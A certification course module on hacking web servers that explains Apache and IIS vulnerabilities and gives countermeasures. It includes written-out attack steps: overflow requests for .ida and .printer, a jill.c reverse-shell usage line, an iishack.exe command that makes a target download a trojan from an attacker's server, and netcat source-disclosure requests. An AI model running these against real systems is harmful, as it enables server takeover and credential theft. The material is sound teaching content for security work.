Module 11 (hacking web servers)

Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Servers
Module XI Page 1 of 54 Ethical Hacking and Countermeasures Copyright © by EC-Council
All rights reserved. Reproduction is strictly prohibited
Ethical Hacking
Module XI
Hacking Web Servers
Ethical Hacking (EH)
Module XI: Hacking Web Servers
Exam 312-50 Ethical Hacking and Countermeasures

Hacking Web Servers
EC-Council
Module Objective
Introduction to Web Servers
Popular Web Servers and Common Vulnerabilities
Apache Web Server Security
IIS Server Security
Attacks against Web Servers
Tools used in Attack
Countermeasures
Module Objectives
The Internet is probably where security or the lack of it is seen the most. Often, a breach in
security causes more damage in terms of goodwill than the actual quantifiable loss. This makes
the security of web servers assume critical importance. Most organizations consider their Internet
presence as an extension of themselves. In this module, we will explore:
• The basic function of a web server
• Popular web servers and common vulnerabilities
• Apache Web Server and known vulnerabilities
• IIS Server vulnerabilities
• Attacks against web servers
• Tools used in Attack against web servers
• Countermeasures that can be adopted
This module attempts to highlight the various security concerns in the context of a web server. It
must be remembered that this is a vast domain and to delve into the finer details of the discussion
is beyond the scope of the module. Readers are encouraged to supplement this module by
following vulnerability discussions on various mailing lists such as bugtraq and security bulletins
issued by third party vendors for various integrated components.

Hacking Web Servers
EC-Council
How Web Servers Work
1. The browser breaks the URL
into three parts:
1. The protocol ("http")
2. The server name
("www.website.com")
3. The file name ("webpage.html")
2. The browser communicates with
a name server, which translates
the server name,
www.website.com, into an IP
address
3. The browser then forms a
connection to the Web server at
that IP address on port 80.
4. Following the HTTP protocol,
the browser sends a GET
request to the server, asking
for the file
http://webpage.html.
5. The server sends the HTML
text for the Web page to the
browser.
6. The browser reads the HTML
tags and formats the page
onto the screen.
Let us take a look at the basic working of a web server. What happens when you type
http://www.eccouncil.org/Certification.htm in your browser?
• The browser differentiates the URL into three parts:
1. The protocol (“http”)
2. The server name (www.eccouncil.com )
3. The file name (“Certification.htm”)
• The browser initiates the connection by communicating with a name server to translate
the server name www.eccouncil.com into a valid IP Address.
• It then uses this IP address to connect to the target web server machine.
• The browser then establishes a connection to the web server at the specific IP address on
port 80. This is the default port. (It can be any other port as well)
• According to the HTTP protocol, the browser sends a GET request to the server, to
retrieve the file "http://Certification.htm"
• The web server then sends the HTML text for the particular Web page to the browser.
• The browser reads the HTML tags and formats the page on the user’s screen.
Other HTTP methods like POST, PUT, are used in subsequent communications if needed. The
response from the server includes the HTTP response code suitable for the result of the request.
In the case of successful data retrieval, an HTTP 200 OK response is generated. Other HTTP
response codes exist: common ones include 404 Not Found, 403 Access Denied, and 302 Object
Moved (often used to redirect requests to a login page to authenticate a user).

Hacking Web Servers
EC-Council
Popular Web Servers and Common
Security Threats
Apache Web Server
IIS Web Server
Sun ONE Web Server
Nature of Security Threats in a Web Server
Environment.
• Bugs or Web Server Misconfiguration.
• Browser-Side or Client Side Risks.
• Sniffing
• Denial of Service Attack.
Popular Web Servers
The popular web servers are Apache Web Server, Internet Information Server and Sun ONE Web
Server.
The Apache HTTP Server is an open-source HTTP server for modern operating systems including
UNIX and Windows NT. The server provides HTTP services in sync with the current HTTP
standards in a secure, efficient and extensible environment.
The Java Web Server / Sun ONE Web Server is one of the other secure and highly available Web
servers on the market. Microsoft’s Internet Information Server is another popular server used by
a sizable percentage of websites.
Common Security Risks
Let us take a look at some of the security concerns that arise in the context of web servers. There
are inherent security risks that affect web servers, the local area networks that host these web
sites, and perhaps even the normal users of web browsers.
Webmaster’s Concern
From a webmaster's perspective, the biggest security concern is that the web server can expose
the local are network or the corporate intranet to the threats posed by the Internet. This may be in
the form of virus, Trojans, hackers or compromise of information itself. It is often considered that
software bugs present in large complex programs are the source of imminent security lapses. Web

Hacking Web Servers
server, being large complex programs do come with these inherent risks. Apart from this, the
open architecture of some Web servers allows arbitrary scripts to be executed on the server's side
of the connection in response to remote requests. Any CGI script installed at the site may contain
bugs that are potential security holes.
Network Administrator’s Concern
From a network administrator's perspective, a poorly configured web server poses another
potential hole in the local network's security. While the objective of a web site is to provide
controlled access to the network, too much of control can make a Web site impossible to use. In
an intranet environment, the network administrator has to careful about configuring the web
server such that legitimate users are recognized and authenticated and various groups of users
assigned distinct access privileges.
End User’s Concern
Usually the end user does not perceive any immediate threat, as surfing the web appears both safe
and anonymous. However, active content, such as ActiveX controls and Java applets, makes it
possible for harmful applications such as viruses to invade the user's system. Besides, active
content from a web browser can be a conduit for malicious software to bypass the firewall system
and permeate the local area network.
The threat for the end user stems from the fact that the TCP/IP protocol was not designed with
security as its foremost priority. Therefore, data can be compromised in terms of confidentiality,
authentication, and integrity as it is transmitted across the Web. In essence the aspects of
confidentiality, authentication, and integrity need to be guarded both on the client side and server
side to the extent possible.
Risks
There are basically three overlapping types of risk:
1. Bugs /misconfiguration problems in the Web server that allow unauthorized remote users
to:
o Steal classified information.
o Execute commands on the server host machine and modifying the system.
o Retrieve host based information to assist them in compromising the system.
o Launch denial-of-service attacks, rendering the machine temporarily unusable.
2. Browser-side risks
o Active content that crashes the browser, damages the user's system, breaches the
user's privacy, or merely creates a disturbance.

Hacking Web Servers
o The misuse of personal information provided by the end-user.
3. Interception of network data sent from browser to server or vice versa via network
eavesdropping. Eavesdroppers can operate from any point on the pathway between
browser and server including:
o The network on the browser's side of the connection.
o The network on the server's side of the connection (including intranets).
o The end-user's Internet service provider (ISP).
o The server's ISP or regional access provider.

Hacking Web Servers
EC-Council
Apache Vulnerability
The Apache Week tracks the vulnerabilities in
Apache Server. Even Apache has its share of
bugs and fixes.
For instance, consider the vulnerability which
was found in the Win32 port of Apache 1.3.20.
• Long URLs passing through the mod_negative,
mod_dir and mode_autoindex modules could cause
Apache to list directory contents.
• The concept is simple but requires a few trial runs.
• A URL with a large number of trailing slashes:
/cgi-bin /////////////// / // / / / / / // / / / could
produce directory listing of the original directory.
The purpose of discussing the various vulnerabilities of the web server here is to highlight how
ingenious attackers can be in exploring the functionality of the various components that they are
able to elicit an unexpected and previously unknown behavior of a piece of code. No matter how
insignificant it is, a security breach can have far reaching implications if left unattended.
This is not the only issue in focus. The possibility of eliminating flawed coding practices and
incorporating proper testing must not be ignored as security measures.
The Apache Week tracks the vulnerabilities in Apache Server. For instance, consider the
vulnerability which was found in the Win32 port of Apache 1.3.20. Because of this, a client
submitting a very long URI could cause a directory listing to be returned rather than the default
index page. This was subsequently fixed in Apache httpd 1.3.22
Some of the other vulnerabilities have been:
Remote DoS via IPv6: When a client requests that proxy ftp connect to a ftp server with IPv6
address, and the proxy is unable to create an IPv6 socket, an infinite loop occurs causing a remote
Denial of Service. This has been fixed in Apache httpd 2.0.47
Remote DoS with multiple Listen directives: In a server with multiple listening sockets a certain
error returned by accept () on a rarely access port can cause a temporary denial of service, due to
a bug in the prefork MPM. This has been fixed in Apache httpd 2.0.47
APR remote crash: A vulnerability in the apr_psprintf function in the Apache Portable Runtime
(APR) library allows remote attackers to cause a denial of service (crash) and possibly execute

Hacking Web Servers
arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly
other vectors. This has been fixed in Apache httpd 2.0.46
Basic Authentication DoS: A build system problem in Apache 2.0.40 through 2.0.45 allows
remote attackers to cause a denial of access to authenticated content when a threaded server is
used. This has been fixed in Apache httpd 2.0.46
Line feed memory leak DoS: Apache 2.0 versions before Apache 2.0.45 have a significant Denial
of Service vulnerability. Remote attackers can cause a denial of service (memory consumption)
via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
This has been fixed in Apache httpd 2.0.45
MSDOS device names cause DoS: Apache versions before 2.0.44 on Windows do not correctly
filter MS-DOS device names which can lead to denial of service attacks and remote code
execution. This has been fixed in Apache httpd 2.0.44
Apache can serve unexpected files: On Windows platforms Apache could be forced to serve
unexpected files by appending illegal characters such as '<' to the request URL. This has been
fixed in Apache httpd 2.0.44
Rewrite rules that include references allow access to any file: The Rewrite module, mod_rewrite,
can allow access to any file on the web server. The vulnerability occurs only with certain specific
cases of using regular expression references in RewriteRule directives: If the destination of a
RewriteRule contains regular expression references then an attacker will be able to access any file
on the server. This has been fixed in Apache httpd 1.3.14

Hacking Web Servers
EC-Council
Attacks against IIS
IIS is one of the most widely used Web server
platforms on the Internet.
Microsoft's Web Server has been the frequent
target over the years.
It has been attacked by various vulnerabilities.
Examples include:
1. ::$DATA vulnerability
2. showcode.asp vulnerability
3. Piggy backing vulnerability
4. Privilege command execution
5. Buffer Overflow exploits (IIShack.exe)
Basics
Let us look at some of the technology that forms the basis of web applications.
Simple HTML could not contribute much to the dynamic nature of interaction on the web.
Therefore, dynamic capabilities were added by using Common Gateway Interface (CGI)
applications. These applications ran on the server and generated dynamic content tailored to each
request. This capability to process input and generate pages in real time greatly expanded the
functional potential of a Web application.
However, as CGI programs were both discrete and resource intensive with each HTTP request,
Microsoft introduced two distinct technologies to serve as the basis for Web applications: Active
Server Pages (ASP) and the Internet Server Application Programming Interface (ISAPI).
ASP scripts are usually written in a human-readable scripting language like Visual Basic, and
Microsoft asserts that the technology is largely language-neutral. It is interesting that this being
said, the ASP interpreter is implemented as an ISAPI DLL.
ISAPI on the other hand is much less visible to end users. Quite naturally, Microsoft uses many
ISAPI DLLs to extend IIS itself. ISAPI DLLs are binary files that are not exactly human-readable
or given to human interpretation. However, if the user knows the name of an ISAPI DLL, it can be
called via HTTP. They are capable of running inside or outside the IIS process (inetinfo.exe) and,
once instantiated remain resident thereby reducing the overhead of spawning a new process for a
CGI executable to service each request.

Hacking Web Servers
Internet Information Services (IIS), the Microsoft Windows based server application, has been
consistently targeted for attacks. Server administrators have been overwhelmed by more than 100
vulnerabilities discovered in IIS web servers in just the last few years alone. It has been seen that
when an IIS server is attacked, the attacker usually tries to run certain commands or access
certain files.
For instance, one popular command that an attacker is likely to run is cmd.exe. Another file that
is likely to be of interest to an attacker on IIS is global.asa, which often contains passwords or
other sensitive information. Previously, many exploits on IIS have involved traversing directories,
viewing server-side scripts, or running a remote command.
Some of the popular vulnerabilities have been:
::$DATA IIS Vulnerability
Microsoft's Internet Information Server (IIS) contained a vulnerability in how it handles the
multiple data streams NTFS provides for each file. The $DATA vulnerability, published in mid-
1998, resulted from an error in the way the Internet Information Server parsed file names.
$DATA is an attribute of the main data stream (which holds the "primary content") stored within
a file on NT File System (NTFS). By creating a specially constructed URL, it was possible to use
IIS to access this data stream from a browser.

Hacking Web Servers
By doing so the attacker could display the code of the file containing that data stream and any
data that the file held. This method could be used to display a script-mapped file that could
normally be acted upon only by a particular Application Mapping. The contents of these files are
not ordinarily available to users. However, in order to display the file, the file must reside on the
NTFS partition and must have ACLs set to allow at least read access; the unauthorized user must
also know the file name. By appending the string ::$DATA, a remote user could view the contents
of a file that is normally set to be acted upon by an Application Mapping, such as Active Server
Pages (ASP). The attacker, however, must previously have read access to this file to view its
contents. This attack could allow a user to read potentially proprietary and compromising script
source. This vulnerability affected Microsoft IIS versions earlier than 3.0.
Showcode.asp
Showcode.asp is a script that allows a web developer to easily view the code for a number of
examples included with Internet Information Server. It comes under several different guises,
including showcode.asp, viewcode.asp, and codebrws.asp among others. Essentially it lets the
developer view the code of a server-side script without executing it. The problem is that it does
not just stop at that because with some manipulation of the URL it lets an attacker view any file
on the same drive as the script. With a little playing around one can easily compromise an entire
server and any sensitive information it contains.
Showcode.asp is included as an example with the Microsoft Data Access Components that are
installed with a number of products or that can be installed individually. The default install
location is C:Program FilesCommon FilesSYSTEMMSADC. In a web server, that subdirectory
is also mapped as a virtual directory named MSADC off the web root.
Showcode.asp takes a single argument indicating the name of the file that is to be viewed. Though
the sample code was initially intended to view code samples in the MSADC directory, a malicious
user can start prodding by taking a path with MSADC and then use directory traversal to move up
the directory tree and on to any path on the same drive. The vulnerability occurred because the
sample script failed to check for that double-dot in the script's argument thereby making it
exploitable.
Piggy-backing privileged command execution on back-end database queries (MDAC/RDS)
MDAC is a package used to integrate Web and database services. It includes the RDS component
that provides remote access to database objects through IIS. By exploiting vulnerabilities in RDS
depending on the security posture of the website, attackers can send random SQL commands that
manipulate the database or retrieve any desired information. In this specific case, the attacker can
even gain administrative rights by embedding the shell () VBA command into the SQL command
and execute any highly privileged system commands.

Hacking Web Servers
Buffer Overflow Vulnerabilities
A buffer is an area of memory within a program that has used to store data of some kind - for
instance, information on the program's status, intermediate computational results, or input
parameters. Before placing any data into a buffer, the program should always verify that the
buffer is large enough to accommodate all of the data.
Otherwise, the data can overrun the buffer and overwrite neighboring data, having the effect of
modifying the program while it's running. If the data that overruns the buffer is random data, it
won't be valid program code, and the program will fail when it tries to execute the random data.
On the other hand, if the data is valid program code, the program will execute the new code and
perform some new function - one chosen by whoever supplied the data. Practically exploitable
remote buffer overflows on Windows are rare, but on IIS, the exploit scene is different. The first
was the .htr buffer overflow exploit against IIS 4, discovered by eEye Digital Security in June
1999. On IIS, the severity of buffer overflows are high because IIS runs under the SYSTEM
account context, buffer overflow exploits often allow arbitrary commands to be run as SYSTEM
on the target system.
Some of the buffer overflows that have been seen are:
• Internet Printing Protocol (IPP) buffer overflow
• Indexing services ISAPI extension buffer overflow
• Code Red Worm
• FrontPage 2000 server extension buffer overflow

Hacking Web Servers
EC-Council
IIS Components
IIS relies heavily on a collection of DLLs that work
together with the main server process, inetinfo.exe, to
provide various capabilities.
Example: Server side scripting, Content Indexing, Web
Based printing etc.
This architecture provides attackers with different
functionality to exploit via malicious input.
IIS relies heavily on a collection of DLLs that work together with the main server process,
inetinfo.exe, to provide various capabilities. Example: Server side scripting, Content Indexing,
Web Based printing etc. This architecture provides attackers with different functionality to exploit
via malicious input. On a Microsoft Internet Information Server (IIS) Web server with no service
packs or hot fixes applied, there are way too many ways that a command shell can be invoked
through inetinfo.exe, the IIS process. Yet, there is no reason for inetinfo.exe to be invoking a shell.
IIS consists of several components. These include:
• Background Intelligent Transfer Service (BITS) server extension: BITS is a background
file transfer mechanism used by applications such as Windows Updates and Automatic
Updates.
• Common Files: On a dedicated Web server, these files are required by IIS and must
always be enabled.
• File Transfer Protocol (FTP) Service: Allows the Web server to provide FTP services. This
component is not required on a dedicated Web server. However, this may be enabled on a
server that is only used for posting content, to support software such as Microsoft
FrontPage® 2002 without enabling FrontPage 2002 Server Extensions. Because the FTP
credentials are always sent in plaintext, it is recommended to connect to FTP servers
through a secured connection, such as those provided by IPSec or a VPN tunnel.
• FrontPage 2002 Server Extensions: Provides FrontPage support for administering and
publishing Web sites. On a dedicated Web server, this must be disabled when no Web
sites are using FrontPage Server Extensions.

Hacking Web Servers
• Internet Information Services Manager: Administrative interface for IIS. This is to be
disabled when the Web server is not administered locally.
• Internet Printing: Provides Web-based printer management and allows printers to be
shared by using HTTP. This component is usually not required on a dedicated Web
server.
• NNTP Service: Distributes, queries, retrieves, and posts Usenet news articles on the
Internet. This component is not required on a dedicated Web server.
• SMTP Service: Supports the transfer of electronic mail. This component is not required
on a dedicated Web server.
• World Wide Web Service: Provides Internet services, such as static and dynamic content,
to clients. This component is required on a dedicated Web server. If this component is not
enabled, then all subcomponents are not enabled.
o Active Server Pages: Provides support for Active Server Pages (ASP). Disable this
component if none of the Web sites or applications on the Web server uses ASP.
o Internet Data Connector: Provides support for dynamic content provided through
files with .idc extensions.
o Disable this component if none of the Web sites or applications on the Web
server include files with .idc extensions.
o Remote Administration (HTML): Provides an HTML interface for administering
IIS. Use IIS Manager instead to provide easier administration and to reduce the
attack surface of the Web server. This component is not required on a dedicated
Web server.
o Remote Desktop Web Connection: Includes Microsoft ActiveX® controls and
sample pages for hosting Terminal Services client connections. Use IIS Manager
instead to provide easier administration and to reduce the attack surface of the
Web server. This component is not required on a dedicated Web server.
o Server-Side Includes: Provides support for .shtm, .shtml, and .stm files. Disable
this component if none of the Web sites or applications on the Web server
includes files with these extensions.
o WebDav Publishing: Web Distributed Authoring and Versioning (WebDAV)
extends the HTTP/1.1 protocol to allow clients to publish, lock, and manage
resources on the Web. Disable this component on a dedicated Web server.
o World Wide Web Service: Provides Internet services, such as static and dynamic
content, to clients. This component is required on a dedicated Web server.

Hacking Web Servers
EC-Council
ISAPI DLL Buffer Overflows
One of the most extreme security vulnerabilities
associated with ISAPI DLLs is the buffer overflow.
In 2001, IIS servers were ravaged by versions of the
Code Red and Nimda worms which were both based on
buffer overflow exploits.
ISAPI - Introduction
Internet Server Application Programming Interface (ISAPI) is an API developed to provide the
application developers with a powerful way to extend the functionality of Internet Information
Server (IIS). ISAPI allows web developers to develop custom code that provides additional web
services. This custom code can either be implemented in an ISAPI filter, if the new functionality
provides a low-level service, or conversely an ISAPI extension, if the new functionality provides a
high-level service. Although ISAPI extensions are not limited to IIS, they are extensively used in
conjunction with MS-IIS.
ISAPI Extension
An ISAPI extension is a dynamic link library (.dll) that uses ISAPI to provide a set of web
functions above and beyond those natively provided by IIS. ISAPI is developed to provide
advantage over the shortcomings of Common Gateway Interface, CGI. An ISAPI extension is a
regular DLL file that exposes three special functions that are called by the calling process (i.e.,
IIS) and therefore, will be loaded to memory only once, irrespective of how many clients are going
to use it at the same time.
Working
Once the concerned ISAPI DLL is loaded into memory, a worker thread starts running to manage
the extension. The first function to be called is the entry point DLLMain function. On completion,
the server makes a call to GetExtensionVersion function to perform two tasks - to exchange
version information and to get a short text description of the extension. The server then calls the

Hacking Web Servers
HttpExtensionProc function passing a copy of the ECB's pointer to start the actual ISAPI
extension. This function makes writing data back to the client possible.
ISAPI DLL Buffer Overflows
As part of its installation process, IIS installs several ISAPI extensions -- .dlls that provide
extended functionality. Among these is idq.dll, which is a component of Index Server (known in
Windows 2000 as Indexing Service) and provides support for administrative scripts (.ida files)
and Internet Data Queries (.idq files).
Recently, buffer overrun security vulnerability was detected because idq.dll contained an
unchecked buffer in a section of code that handled input URLs. An attacker who could establish a
web session with a server on which idq.dll was installed could conduct a buffer overrun attack and
execute code on the web server. Idq.dll runs in the System context, therefore exploiting the
vulnerability would give the attacker complete control of the server and allow him to take any
desired action on it.
Exploitation of the buffer overflow involves sending an overlong variable to idq.dll, as shown in
the following example, where [buffer] is equivalent to approximately 240 bytes:
GET / null.ida?[ buffer]=X HTTP/1.1
Host: [ arbitrary_value]
The buffer overrun occurs before any indexing functionality is requested. As a result, even though
idq.dll is a component of Index Server/Indexing Service, the service would not need to be running
in order for an attacker to exploit the vulnerability. As long as the script mapping for .idq or .ida
files were present and the attacker were able to establish a web session, he could exploit the
vulnerability.
An attacker who successfully exploited this vulnerability could gain complete control over an
affected web server. This would give the attacker the ability to take any desired action on the
server, including changing web pages, reformatting the hard drive or adding new users to the
local administrators group.
Exploits
Perhaps the greatest exploits that took advantage of the buffer overflow vulnerability are the code
red and nimda virus. These worms are discussed in detail in the module on viruses. A worm is a
generic term for a piece of code that replicates itself on a network. Typically, worms exploit some
popular remote security flaw to infect systems, take control of the victim, and causes damage
before setting about launching new attacks against further victims.

Hacking Web Servers
EC-Council
IPP Printer Overflow
There is a buffer overflow in IIS within the ISAPI filter
that handles .printer files
(c:winntsystem32msw3prt.dll) that provides support
for the Internet Printing Protocol (IPP)
IPP enables the web-based control of various aspects of
networked printers.
The vulnerability arises when a buffer of approximately
420 bytes is sent within the HTTP host.
GET /NULL.printer HTTP/1.0 HOST: [buffer]
Internet Printing Protocol
Windows 2000 introduced native support for the Internet Printing Protocol (IPP), an industry-
standard protocol for submitting and controlling print jobs over HTTP. The protocol is
implemented in Windows 2000 via an ISAPI extension that is installed by default as part of
Windows 2000 but which can only be accessed via IIS 5.0.
Vulnerability
There was a buffer overrun vulnerability that resulted because the ISAPI extension contained an
unchecked buffer in a section of code that handled input parameters. This could enable a remote
attacker to conduct a buffer overrun attack and cause code of his choice to run on the server. Such
code would run in the Local System security context. This would give the attacker complete
control of the server, and would enable him to take virtually any action he chose.
The attacker could exploit the vulnerability against any server with which he could conduct a web
session. No other services would need to be available, and only port 80 (HTTP) or 443 (HTTPS)
would need to be open.
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll, which handles user
requests. A security vulnerability, discovered by Riley Hassell from eEye, in msw2prt.dll, does not
correctly perform input validation checking allowing an attacker to overflow a buffer and run any
program in the SYSTEM context.

Hacking Web Servers
Due to the unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .print request containing
approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. A remote command
shell is trivial for the attacker to execute and destructive for the web site because it allows the
attacker complete control over the web server. Typically a web server would stop responding in a
buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it
automatically performs a restart. Therefore, the administrator will be unaware of this attack. This
however makes it easier for remote attacks to execute code against Windows 2000 IIS 5.0 web
servers. If Web-based Printing has been configured with a group policy, attempts to disable or
unmap the affected extension via Internet Services Manager will be overridden by the group
policy settings.
Exploits
Ryan Permeh of eEye Digital Security released 'iishack2000.c' exploit.
The vulnerability arises when a buffer of approx. 420 bytes is sent within the HTTP Host: header
for a .printer ISAPI request. Remotely exploits buffer overflow, inserts shellcode to “shovel a
shell” back to a listener on attacker’s system.
Example:
GET /NULL.printer HTTP/1.0
Host:[buffer] (Where [buffer] is approx. 420 characters.)
At this point an attacker would have caused a buffer overflow within IIS and have overwritten
EIP. Now normally the web server would stop responding once the attacker has "buffer
overflowed" it. However, Windows 2000 will automatically restart the web server if it notices that
the web server has crashed.

Hacking Web Servers
This exploit will run against an IIS 5 web server, create a text document on the remote server with
instructions directing readers to a web page on eeye.com that has information on how to patch
the system so that the web server is no longer vulnerable to this flaw.
Wanderley J. Abreu Jr. provided the memory leak 'iiswebexplt.pl' exploit.
This code requires perl and is run from the command line as “perl iiswebexpl.pl victim”. Upon
execution, the code outputs the results in text on the screen stating if the victim web server is
vulnerable or not vulnerable.
Dark spyrit provided the 'jill.c' exploit.
The exploit code jill.c, is a 167-line program written in the C language, authored by a grey-hat
hacker in New Zealand who uses the nickname Dark Spyrit. Although jill is written in UNIX C,
compiling it on Windows 2000 is a snap with the Cygwin environment. Cygwin compiles UNIX
code with an “abstraction layer” library—cygwin1.dll—that intercepts the native UNIX calls and
translates them into Win32 equivalents. Therefore as long as the cygwin1.dll is in the working
path from where the compiled executable is run, it would function on Win32 as it would under
UNIX or Linux.
Using the compiled code against a default installation of IIS 5.0, an attacker merely needs to type
in the name of a remote system and a port number, and gain complete control of the machine in a
matter of seconds. It provides the remote attacker with a command shell with SYSTEM level
access. Therefore the exploit grants full control over the system allowing the attacker to “own”
the system.
$ ./jill
iis5 remote .printer overflow.
dark spyrit <dspyrit@beavuh.org> / beavuh labs.
usage: ./jill <victimHost> <victimPort> <attackerHost> <attackerPort>

Hacking Web Servers
Because the initial attack occurs via the Web application channel (port 80, typically) and because
the shell is shoveled outbound from the victim Web server on a port defined by the attacker, this
attack is difficult to stop using router or firewall filtering.
Cyrus the Great provided the 'iis5hack.zip' exploit
This is basically the jill.c script with some changes to make it easier to compile on the Windows
platform which in effect makes it a real point and click exploit code. It also includes a perl script
and a binary for Windows NT.
Variants: IIS5 Koei.exe
This executable is a simple Win32 version of jill.c which exploits IIS5 .IPP printer bug. The exploit
will spawn a reverse cmd.exe to port 7882. In order to work the user must not be fire walled on
that port.

Hacking Web Servers
EC-Council
Hacking Tool: IISHack.exe
iishack.exe overflows a buffer used by IIS http daemon,
allowing for arbitrary code to be executed.
c: iishack www.yourtarget.com 80
www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking,80 is
the port its listening on, www.yourserver.com is some
webserver with your trojan or custom script (your own,
or another), and /thetrojan.exe is the path to that script.
“IIS Hack” is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR
extensions. A hacker sends a long URL that ends with “.HTR”. IIS interprets it as a file type of
HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer
overflow, a carefully crafted string can be executed in the security context of IIS, which is
privileged. For example, it is relatively simple to include in the exploit code a sequence of
commands that will open a TCP/IP connection, download an executable and then execute it. This
way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker’s system running a web server can use iishack.exe and
ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run
against the victim site.
c:>iishack.exe <target> 80 <attacker>/ncx.exe
The attacker can then use netcat to evoke the command shell
c:>nc <target> 80
He can proceed to upload and execute any Trojan of his choice and maintain a backdoor on the
target site.

Hacking Web Servers
EC-Council
IPP Buffer Overflow Countermeasures
Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers
Without any further explanation, the first countermeasure is obviously to install the latest service
packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that
ships with IIS 5 and is configured by default to handle requests for certain file types. This
particular ISAPI filter resides in C:WINNTSystem32msw3prt.dll and provides Windows 2000
with support for the IPP. If this functionality is not required on the Web server, the application
mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in
order to prevent the buffer overflow from being exploited. This is possible because the DLL will
not be loaded into the IIS process when it starts up. In fact, most security issues are centered on
the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted
when securing IIS.
Another standard countermeasure that ca be adopted here is to use a firewall and remove any
extensions that are not required. Implementing aggressive network egress can help to a certain
degree.
With IIS, using IISLockdown and URLScan - free utilities from Microsoft can ensure more
protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more
proactive solution in case there are additional vulnerabilities that are yet to be found with the
code.

Hacking Web Servers
EC-Council
ISAPI DLL Source disclosures
Microsoft IIS 4.0 and 5.0 can be made to disclose
fragments of source code which should otherwise be in
accessible.
This is done by appending "+.htr" to a request for a
known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled
by ISM.DLL, which then strips the ‘+.htr’ string and
may disclose part or all of the source of the .asp file
specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor
requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in
ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user
passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers.
Windows NT users can use .HTR scripts to change their own passwords, and administrators can
use them to perform a wide array of password administration functions. HTR is a first-generation
advanced scripting technology that is included in IIS 3.0, and still supported by later versions of
IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded
by Active Server Pages (ASP) technology introduced in IIS 4.0.
Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around
230 + “ %20 “ (these represents spaces) and then appending “ .htr ” this tricks IIS into thinking
that the client is requesting a “ .htr “ file . The .htr file extension is mapped to the ISM.DLL ISAPI
Application and IIS redirects all requests for .htr resources to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL
truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file
whose source is sought. The contents are then returned. This attack can only be launched once
though, unless the web service started and stopped. It will only work when ISM.DLL first loaded
into memory.
An attacker can view the source of global.asa, for instance, as follows

Hacking Web Servers
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr will reveal the source of
global.asa
The vulnerability involves an unchecked buffer in ISM.DLL. This poses two threats to safe
operation. The first is a denial of service threat. A malformed request for an .HTR file could
overflow the buffer, causing IIS to crash. The server would not need to be rebooted, but IIS would
need to be restarted.
"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service
vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a
particular way. This vulnerability exists because the search routine for the delimiter isn't properly
bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI
filter that processes it would search forever for the delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter,
ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would
prevent the server from servicing any more password change requests. In addition, the search
would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could
cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither
scenario could occur accidentally. This vulnerability does not involve the functionality of the
password administration features of .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability
could allow fragments of certain types of files to be read by providing a malformed request that
would cause the .HTR processing to be applied to them. This vulnerability could allow a malicious
user to read certain types of files under some very restrictive circumstances by levying a bogus
.HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this
would have the effect of removing virtually everything but text from a selected file. That is, it
would have the effect of stripping out the very information that is most likely to contain sensitive
information in .asp and other server-side files.
The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any
administrative control on the server to be usurped. Although .HTR files are used to allow web-
based password administration, this vulnerability does not involve any weakness in password
handling.
“Absent Directory Browser Argument” vulnerability: Among the default HTR scripts provided
in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site
administrators to view directories on the server. One of these scripts, if called without an expected
argument, will enter an infinite loop that can consume all of the system’s CPU availability, thereby
preventing the server from responding to requests for service.

Hacking Web Servers
EC-Council
ISAPI.DLL Exploit
Here's a sample file called htr.txt that you can pipe through a
netcat to exploit the ISAPI.DLL vulnerability.
GET /site1/global.asa+.htr HTTP/1.0
[CRLF]
[CRLF]
Piping through netcat connected to a vulnerable server
produces the following results:
c: >nc -vv www.victim.com 80 <htr.txt
HTTP/1.1 200 OK
Server: Microsoft -IIS /5.0

("Profiles_ConnectionString")
"DSN=Profiles; UID=Company_user;
password=secret" Password
Revealed
By requesting an existing filename (for example, global.asa) with an appendage of "+" and
extention of ".htr" from Microsoft Internet Information Server 4.0/5.0 , IIS will be tricked to call
ISM.DLL ISAPI application to deal with this request. When "+" is found in the filename, ISM.DLL
will truncate the "+.htr" and open the target file (global.asa). If the target file is not ".htr" file ,
part of target file source code will be exposed to the attacker. For example, an attacker can
retrieve the content of global.asa which often contains some sensitive information such as SQL
server's username and password.
